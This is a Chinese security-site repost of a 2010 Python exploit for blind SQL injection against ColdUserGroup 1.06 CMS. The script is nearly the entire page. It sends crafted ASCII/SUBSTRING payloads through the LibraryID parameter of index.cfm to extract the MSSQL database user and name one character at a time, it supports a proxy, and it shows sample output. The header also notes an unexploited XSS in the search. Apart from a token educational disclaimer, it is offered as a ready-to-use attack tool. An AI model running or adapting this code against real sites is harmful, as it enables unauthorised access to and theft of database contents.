首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ColdUserGroup 1.06 Blind SQL Injection Exploit
来源:ninja.net 作者:mr_me 发布时间:2010-09-08  

#!/usr/bin/python
# ColdGen - coldusergroup v1.06 0day Remote Blind SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerabilities:
# ===================
# - Blind SQL Injection in the index.cfm using parameters: ArticleID & LibraryID
# - XSS in the search
#
# This tool assumes the target has a MSSQL backend.
# ./ColdUsrGrp0day.py -p localhost:8080 -s "Author:" -t localhost:8500 -d /coldusrgrp/
#
#  | ----------------------------------------------------------------- |
#  |  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |
#  | -------------------[ by mr_me - net-ninja.net ]------------------ |
#
# (+) Exploiting target @: http://localhost:8500/coldusrgrp/
# (+) Using string 'Author:' for the true page
# (+) This will take time, have patience..
#
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
#
# (!) Getting database user: sa
# (!) Getting database name: coldusergroup

import sys, urllib, re
from optparse import OptionParser

usage = "./%prog [<options>] -s [true string] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -s 'Author:' -t localhost:8500 -d /coldusrgrp/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
parser.add_option("-s", type="string", action="store", dest="trueStr",
                  help="String that is on the 'true' page")
(options, args) = parser.parse_args()

def banner():
    print "\n\t| ----------------------------------------------------------------- |"
    print "\t|  -= ColdUserGroup v1.6 0day Remote Blind SQL Injection Exploit =- |"
    print "\t| -------------------[ by mr_me - net-ninja.net ]------------------ |\n"

if len(sys.argv) < 5:
 banner()
 parser.print_help()
 sys.exit(1)

def setTargetHTTP():
 if options.target[0:7] != 'http://':
  options.target = "http://" + options.target
 return options.target
 
def getProxy():
 try:
  proxy = {'http': "http://"+options.proxy}
  opener = urllib.FancyURLopener(proxy)
 except(socket.timeout):
  print "\n(-) Proxy Timed Out"
  sys.exit(1)
 except(),msg:
  print "\n(-) Proxy Failed"
  sys.exit(1)
 return opener
 
def getRequest(exploit):
 if options.proxy:
  try:
   options.target = setTargetHTTP()
   opener = getProxy()
   check = opener.open(options.target+options.directory+exploit).read()
  except urllib.error.HTTPError, error:
   check = error.read()
  except socket.error:
   print "(-) Proxy connection failed"
   sys.exit(1)
 else:
  try:
   check = urllib.urlopen(options.target+options.directory+exploit).read()
  except urllib.error.HTTPError, error:
   check = error.read()
  except urllib.error.URLError:
   print "(-) Target connection failed, check your address"
   sys.exit(1)
 return check

basicInfo = {'user':'user_name(0)', 'name':'db_name(0)'}

def getBasicInfo(info, x):
    for i in range(32,126):
  request = ("index.cfm?actcfug=LibraryView&LibraryID=209+AND+ISNULL"
  "(ASCII(SUBSTRING(CAST((SELECT+LOWER("+info+"))AS+varchar(8000)),"+str(x)+",1)),0)="+str(i))
  result = getRequest(request)
  if re.search(options.trueStr,result):
   x = x+1
   sys.stdout.write(chr(i))
   getBasicInfo(info, x)
 
if __name__ == "__main__":
 x = 1
 banner()
 options.target = setTargetHTTP()
 print "(+) Exploiting target @: %s" % (options.target+options.directory)
 print "(+) Using string '%s' for the true page" % (options.trueStr)
 print "(+) This will take time, have patience.."
 if options.proxy:
  print "\n(+) Testing Proxy..."
  print "(+) Proxy @ %s" % (options.proxy)
  print "(+) Building Handler.."

 for key in basicInfo:
  sys.stdout.write("\n(!) Getting database " + key + ": ")
  getBasicInfo(basicInfo[key], x)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ColdCalendar 2.06 SQL Injectio
·QQPlayer 2.3.696.400p1(.wav) D
·Java Bridge v. 5.5 Directory T
·Internet Download Accelerator
·Novell Netware NWFTPD RMD/RNFR
·Integard Home and Pro v2 Remot
·win32/vista sp1 ING. (cmd.exe)
·Live School Portal Database Di
·phpcrs <= 3.Za / Local File In
·WebWiz Denial of Service POC
·IZArc DLL Hijacking (ztv7z.dll
·HP OpenView NNM webappmon.exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved